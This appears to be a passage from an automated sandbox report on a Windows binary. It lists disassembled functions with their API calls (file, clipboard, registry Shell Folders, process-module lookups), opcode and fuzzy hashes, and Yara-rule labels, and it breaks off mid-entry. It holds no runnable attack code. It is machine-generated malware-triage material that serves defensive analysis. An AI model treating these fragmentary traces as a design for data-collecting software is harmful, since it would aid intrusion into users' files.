                                                  Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                  Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$FileModuleName
                                                  • String ID:
                                                  • API String ID: 3859505661-0
                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                  Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                  Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                  Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                  Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                  Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                  Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                  Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                  Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                  Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                  Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: EnumNamesResource
                                                  • String ID:
                                                  • API String ID: 3334572018-0
                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                  Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                  Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                  Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                  Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                  Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                  Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                  • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                  Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004095FC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                    • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                    • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3655998216-0
                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                  Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00445426
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                  • String ID:
                                                  • API String ID: 1828521557-0
                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                  Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                  • String ID:
                                                  • API String ID: 2136311172-0
                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                  Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@
                                                  • String ID:
                                                  • API String ID: 1936579350-0
                                                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

                                                  Non-executed Functions

                                                  Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                  • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                  • GetLastError.KERNEL32 ref: 00409974
                                                  • CloseClipboard.USER32 ref: 0040997D
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                  • String ID:
                                                  • API String ID: 2565263379-0
                                                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                  Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                  • API String ID: 2780580303-317687271
                                                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                  Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
